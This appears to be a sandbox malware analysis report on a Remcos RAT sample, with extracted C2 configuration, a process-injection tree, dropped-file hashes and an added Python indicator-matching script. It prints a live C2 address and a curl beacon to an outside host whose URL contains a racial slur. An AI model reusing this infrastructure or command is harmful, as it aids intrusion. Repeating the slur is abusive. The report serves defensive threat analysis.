Analysis
-
max time kernel
117s
-
max time network
119s
-
platform
windows7_x64
-
resource
win7-20240215-en
-
resource tags
arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted
22-04-2024 11:56
Static task
static1
Behavioral task
behavioral1
Sample
av_sec.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
av_sec.exe
Resource
win10v2004-20240412-en
General
-
Target
av_sec.exe
-
Size
11.2MB
-
MD5
ab2c5633a45550670bca99f5cb82310c
-
SHA1
1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e
-
SHA256
3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf
-
SHA512
80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9
-
SSDEEP
196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
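An extracted config like the one above is most useful once it is turned into hunting artifacts, but several of its fields only matter if their feature flag is set. With install_flag, keylog_flag and screenshot_flag all false, this build leaves no copy under %AppData%\Remcos, no logs.dat and no screenshot folder, so the durable indicators are the C2 endpoint and the mutex. The Python below is an added example, not part of the Triage report and not Remcos or Triage code; it encodes that gating and matches the result against a few constructed telemetry events. Its assumptions are marked in comments: RemoteHost is split on "|" in case a build lists several hosts (this report shows one), the artifact paths are rooted at %AppData% the way screenshot_path is, and "Rmc-" is treated as a mutex-name prefix only because this sample's mutex starts with it.

```python
# Added example: turn the extracted Remcos configuration into hunting indicators
# and match them against telemetry. Not Triage or Remcos code.

# Values transcribed from the "Malware Config" section of the report.
CONFIG = {
    "RemoteHost": "178.33.57.155:443",
    "mutex": "Rmc-PM1AI7",
    "install_flag": False, "copy_folder": "Remcos", "copy_file": "remcos.exe",
    "keylog_flag": False, "keylog_folder": "remcos", "keylog_file": "logs.dat",
    "screenshot_flag": False, "screenshot_path": "%AppData%", "screenshot_folder": "Screenshots",
}

# Constructed telemetry (not from the report): two connections, one mutex, one file write.
SAMPLE_EVENTS = [
    {"type": "netconn", "image": "RttHlp.exe", "dst": "178.33.57.155", "dport": 443},
    {"type": "netconn", "image": "curl.exe", "dst": "94.156.66.107", "dport": 9000},
    {"type": "mutex", "image": "cmd.exe", "name": "Rmc-PM1AI7"},
    {"type": "file_create", "image": "RttHlp.exe", "path": "%AppData%\\Remcos\\remcos.exe"},
]


def c2_endpoints(remote_host):
    """Parse 'host:port' C2 entries. Splitting on '|' is an assumption to cope with
    builds that list several hosts; this report shows exactly one."""
    endpoints = []
    for entry in remote_host.split("|"):
        host, _, port = entry.strip().rpartition(":")  # rpartition: port is after the last colon
        endpoints.append((host, int(port)))
    return endpoints


def expected_artifacts(cfg):
    """Disk artifacts this build will create; each exists only if its flag is on.
    Assumption: all three are rooted at %AppData%, as screenshot_path is in this config."""
    artifacts = []
    if cfg["install_flag"]:
        artifacts.append(("persistence_copy", f"%AppData%\\{cfg['copy_folder']}\\{cfg['copy_file']}"))
    if cfg["keylog_flag"]:
        artifacts.append(("keylog", f"%AppData%\\{cfg['keylog_folder']}\\{cfg['keylog_file']}"))
    if cfg["screenshot_flag"]:
        artifacts.append(("screenshots", f"{cfg['screenshot_path']}\\{cfg['screenshot_folder']}"))
    return artifacts


def match_events(cfg, events):
    """Return (rule, event) pairs for telemetry that matches this config."""
    c2 = set(c2_endpoints(cfg["RemoteHost"]))
    paths = {p.lower() for _, p in expected_artifacts(cfg)}
    mutex_prefix = cfg["mutex"].split("-")[0] + "-"  # 'Rmc-' here; assumed generic
    hits = []
    for ev in events:
        if ev["type"] == "netconn" and (ev["dst"], ev["dport"]) in c2:
            hits.append(("c2_connect", ev))
        elif ev["type"] == "mutex" and (ev["name"] == cfg["mutex"] or ev["name"].startswith(mutex_prefix)):
            hits.append(("remcos_mutex", ev))
        elif ev["type"] == "file_create" and ev["path"].lower() in paths:
            hits.append(("config_artifact", ev))
    return hits


if __name__ == "__main__":
    print("C2:", c2_endpoints(CONFIG["RemoteHost"]))
    print("Expected artifacts:", expected_artifacts(CONFIG) or "none (all feature flags off)")
    for rule, ev in match_events(CONFIG, SAMPLE_EVENTS):
        print(f"{rule:15} {ev}")
```

The second connection in the constructed events (94.156.66.107:9000) is deliberately not matched: it comes from the curl in the process tree, not from the Remcos config, and needs its own indicator.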
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
pid   process
2204  RttHlp.exe
2604  RttHlp.exe
-
Loads dropped DLL 6 IoCs
Processes:
pid   process
2204  RttHlp.exe (4 loads)
2604  RttHlp.exe (2 loads)
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process     target process
PID 2604 set thread context of 2876  2604  RttHlp.exe  cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
pid   process
2824  av_sec.exe (2)
2204  RttHlp.exe (1)
2604  RttHlp.exe (2)
2876  cmd.exe (2)
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid   process
2604  RttHlp.exe
2876  cmd.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid   process
2824  av_sec.exe
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
description (count)                        pid   process       target process
PID 2824 wrote to memory of 2204 (x4)      2824  av_sec.exe    RttHlp.exe
PID 2204 wrote to memory of 2604 (x4)      2204  RttHlp.exe    RttHlp.exe
PID 2604 wrote to memory of 2876 (x5)      2604  RttHlp.exe    cmd.exe
PID 2876 wrote to memory of 2020 (x5)      2876  cmd.exe       explorer.exe
PID 2020 wrote to memory of 2384 (x4)      2020  explorer.exe  WScript.exe
PID 2384 wrote to memory of 2812 (x4)      2384  WScript.exe   cmd.exe
PID 2876 wrote to memory of 2020 (x1)      2876  cmd.exe       explorer.exe
PID 2020 wrote to memory of 1688 (x4)      2020  explorer.exe  WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_sec.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\av_sec.exe"
  Depth: 1
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 2824
-
  C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
    Depth: 2
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2204
-
    C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
      Command line: C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
      Depth: 3
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
      PID: 2604
-
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\SysWOW64\cmd.exe
        Depth: 4
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        PID: 2876
-
        C:\Windows\SysWOW64\explorer.exe
          Command line: C:\Windows\SysWOW64\explorer.exe
          Depth: 5
          - Suspicious use of WriteProcessMemory
          PID: 2020
-
          C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
            Depth: 6
            - Suspicious use of WriteProcessMemory
            PID: 2384
-
            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=GHPZRGFC
              Depth: 7
              PID: 2812
-
          C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kcdwmvakozwgwvpbpmnwpycjxlsie.vbs"
            Depth: 6
            PID: 1688
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
5.5MB
MD5
320634072eddd5b14ddddcf0e32d6608
SHA1
d8db9bf00db95b25d2cd8b2c5888d250b535232b
SHA256
bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714
SHA512
8ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff
-
Filesize
1.2MB
MD5
7fc367e04dbafab25f83e2e9cefb06cc
SHA1
cb64b8ffcad54cee2081d61f5a8974b0e608a301
SHA256
fc03c90357f6f25a492f4dd2871dc087e220494aa80c5d2ab2217843f91c988b
SHA512
e41d9be708c9950bb33e16213a6d40f485b328438f5b66ac001b7705aaa8be0a698f9b62cd6b552e0e53b38db5c4f501d3da1c27660261e9594917d39ecba906
-
Filesize
1.0MB
MD5
40b9628354ef4e6ef3c87934575545f4
SHA1
8fb5da182dea64c842953bf72fc573a74adaa155
SHA256
372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12
SHA512
02b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641
-
Filesize
135KB
MD5
a2d70fbab5181a509369d96b682fc641
SHA1
22afcdc180400c4d2b9e5a6db2b8a26bff54dd38
SHA256
8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473
SHA512
219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83
-
Filesize
11KB
MD5
6e4ffb2517b3570bf0c6766b8a0253fa
SHA1
2143b82dd1c8c3f4d0e0b146e65667a4e8552a9e
SHA256
d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41
SHA512
d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f
-
Filesize
1.0MB
MD5
4b12739a07c02ef25a45d80516a87100
SHA1
d976238dd9a697b7c35f85d3157282dfb68f4522
SHA256
f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6
SHA512
f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265
-
Filesize
1.9MB
MD5
95ecaf8770cb3d948f45588fc04e0dfd
SHA1
49890478b975dcbb7bac20e330d9498312583f85
SHA256
5708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285
SHA512
55fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc
-
Filesize
146B
MD5
85a2ebad40c21ba1da77230265b5351f
SHA1
803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256
b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512
77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize
260B
MD5
20194639a471c85332924601e071aec4
SHA1
6a69ca7f78b34ca6a3959236237ef62de1cf09a2
SHA256
43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8
SHA512
5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079
-
Filesize
1.1MB
MD5
adf82ed333fb5567f8097c7235b0e17f
SHA1
e6ccaf016fc45edcdadeb40da64c207ddb33859f
SHA256
d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50
SHA512
2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92